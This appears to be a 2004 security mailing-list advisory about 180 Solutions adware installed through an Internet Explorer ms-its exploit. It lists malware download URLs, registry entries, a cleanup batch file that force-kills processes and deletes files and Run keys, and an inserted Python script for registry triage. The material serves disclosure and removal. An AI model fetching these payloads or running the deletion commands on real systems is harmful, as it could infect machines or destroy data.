180 Solutions Exploits and Toolbars Hacking Patched Users(I.E Exploits)
From: Rafel Ivgi, The-Insider (theinsider_at_012.NET.IL)
Date: 06/03/04
Date: Thu, 3 Jun 2004 04:20:48 +0200 To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
180 Solutions Exploits and Toolbars Hacking Patched Users
By Rafel Ivgi, The-Insider
Table Of Contents:
*********************
1. Class Name
2. Infecting Files
3. Related Registry Entries
4. Cleaner
5. Solution
6. Visit : http://theinsider.deep-ice.com
1. Class Name: iiittt Class
****************************
*Comment : All actions performed on your machine are logged in the following
hidden file:
C:\WINDOWS\system32\log.bak.txt
Class Id : {FE1A240F-B247-4E06-A600-30E28F5AF3A0}
Downloading c:\install.cab
Executing c:\install.htm
2. Infecting Files:
********************
http://downloads.180solutions.com/keywords/kyf.258.gz to
c:\windows\system32\kyf.dat
http://installs.180solutions.com/downloads/boom/2.0/RBoomerang.1 to
C:\WINDOWS\abolaror.exe
http://installs.180solutions.com/downloads/5.6/msbb.exe to
c:\windows\system32\FLEOK\msbb.exe
http://installs.180solutions.com/Downloads/DLL/3.0/ncmyb.dll to
c:\windows\system32\FLEOK\ncmyb.dll
3. Related Registry Entries:
******************************
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}]
@="iiittt Class"
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Control]
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Implemented Categories]
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}]
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InprocServer32]
@="C:\\WINDOWS\\System32\\windec32.dll"
"ThreadingModel"="Apartment"
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\MiscStatus]
@="0"
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\MiscStatus\1]
@="131473"
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\ProgID]
@="windec.iiittt.1"
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Programmable]
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\ToolboxBitmap32]
@="C:\\WINDOWS\\System32\\windec32.dll, 102"
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\TypeLib]
@="{660B38CB-6349-4C67-A418-AADABAE09C38}"
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Version]
@="1.0"
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\VersionIndependentProgID]
@="windec.iiittt"
[HKEY_CLASSES_ROOT\windec.iiittt]
@="iiittt Class"
[HKEY_CLASSES_ROOT\windec.iiittt\CLSID]
@="{FE1A240F-B247-4E06-A600-30E28F5AF3A0}"
[HKEY_CLASSES_ROOT\windec.iiittt\CurVer]
@="windec.iiittt.1"
[HKEY_CLASSES_ROOT\windec.iiittt.1]
@="iiittt Class"
[HKEY_CLASSES_ROOT\windec.iiittt.1\CLSID]
@="{FE1A240F-B247-4E06-A600-30E28F5AF3A0}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}]
"SystemComponent"=dword:00000000
"Installer"="MSICD"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Contains]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Contains\Files]
"C:\\WINDOWS\\System32\\windec32.dll"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\DownloadInformation]
"CODEBASE"="file://C:\\install.cab"
"INF"="C:\\WINDOWS\\Downloaded Program Files\\windec32.inf"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InstalledVersion]
@="2,0,0,0"
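The DownloadInformation entry above is the telltale: the control was registered by the Internet Component Download installer (MSICD) from a CODEBASE of file://C:\install.cab, i.e. from a CAB dropped on the local disk rather than from a remote URL. As an added triage example (not the author's tool and not part of XPLizer), the Python below parses a .reg-style export and flags every Code Store Database distribution unit whose CODEBASE is a local file:// path, pairing it with the DLL its CLSID loads. The sample input is constructed from the entries above plus one placeholder unit with a remote CODEBASE that must not be flagged.

```python
import re

# Constructed sample: a trimmed .reg export of the keys listed above, plus a
# placeholder unit (all-zero CLSID, example.invalid) with a remote CODEBASE.
SAMPLE_REG = r'''
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InprocServer32]
@="C:\\WINDOWS\\System32\\windec32.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\DownloadInformation]
"CODEBASE"="file://C:\\install.cab"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{00000000-0000-0000-0000-000000000000}\DownloadInformation]
"CODEBASE"="http://example.invalid/placeholder.cab"
'''
KEY_RE = re.compile(r'^\[(.+)\]$')
VAL_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
DU_PREFIX = 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Code Store Database\\Distribution Units\\'

def parse_reg(text):
    """Parse .reg-style text into {key_path: {value_name: value}}; string values only."""
    tree, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            tree.setdefault(current, {})
            continue
        m = VAL_RE.match(line)
        if m and current is not None:
            name = '' if m.group(1) == '@' else m.group(1)[1:-1]
            raw = m.group(2)
            if raw.startswith('"') and raw.endswith('"'):
                raw = raw[1:-1].replace('\\\\', '\\')  # undo .reg backslash escaping
            tree[current][name] = raw
    return tree

def suspicious_distribution_units(tree):
    """Return (clsid, codebase, dll) for units whose CODEBASE is a local file://
    path: a control fetched from the web records its remote CAB URL instead."""
    hits = []
    for key, values in tree.items():
        if not (key.startswith(DU_PREFIX) and key.endswith('\\DownloadInformation')):
            continue
        codebase = values.get('CODEBASE', '')
        if not codebase.lower().startswith('file://'):
            continue
        clsid = key[len(DU_PREFIX):].split('\\')[0]
        inproc = tree.get('HKEY_CLASSES_ROOT\\CLSID\\' + clsid + '\\InprocServer32', {})
        hits.append((clsid, codebase, inproc.get('', '')))
    return hits
```

Run `suspicious_distribution_units(parse_reg(open('export.reg').read()))` against a real export from `reg export HKLM\SOFTWARE\Microsoft\Code Store Database` to get the same triage on a live machine.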
4. Cleaner:
*************
Filename=180killer.bat:
------------------------------------------- CUT HERE -------------------------------------------------
REM Stop the browser, the shell and the COM surrogate so the files below are not locked
taskkill /f /im iexplore.exe
taskkill /f /im explorer.exe
taskkill /f /im dllhost.exe
REM Remove the dropped installer CAB and the HTML page that launched it
del c:\install.htm
del c:\install.cab
REM Kill and delete each dropped executable
taskkill /f /im abolaror.exe
del C:\WINDOWS\abolaror.exe
taskkill /f /im msbb.exe
del c:\windows\system32\FLEOK\msbb.exe
taskkill /f /im apconaj.exe
del c:\windows\system32\apconaj.exe
taskkill /f /im alchem.exe
del c:\windows\alchem.exe
REM Remove the dropped directories and the ActiveX control DLL registered under the CLSID above
rmdir /s /q c:\windows\system32\FLEOK
rmdir /s /q c:\windows\sbnet
del C:\WINDOWS\System32\windec32.dll
REM Restart the shell
explorer.exe
REM Remove the autostart entries
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v ShowBehind /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v msbb /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v abolaror /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v chiqarsfneg /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v alchem /f
------------------------------------------- CUT HERE -------------------------------------------------
5. Solution:
*************
The execution of this Internet Explorer exploit was caused by the ms-its protocol [even on patched systems].
The ms-its protocol is not needed for normal Windows operation, therefore
it should be removed.
XPLizer - Windows Hardening Frontend Tool - updated to remove the ms-its
protocol.
http://www.securiteam.com/tools/5EP081FCKI.html
The sources of XPLizer can be found at
http://theinsider.deep-ice.com/xplizer-src.zip
An executable version can be found at
http://theinsider.deep-ice.com/xplizer.zip
The official readme file for XPLizer can be found at
http://theinsider.deep-ice.com/readme.txt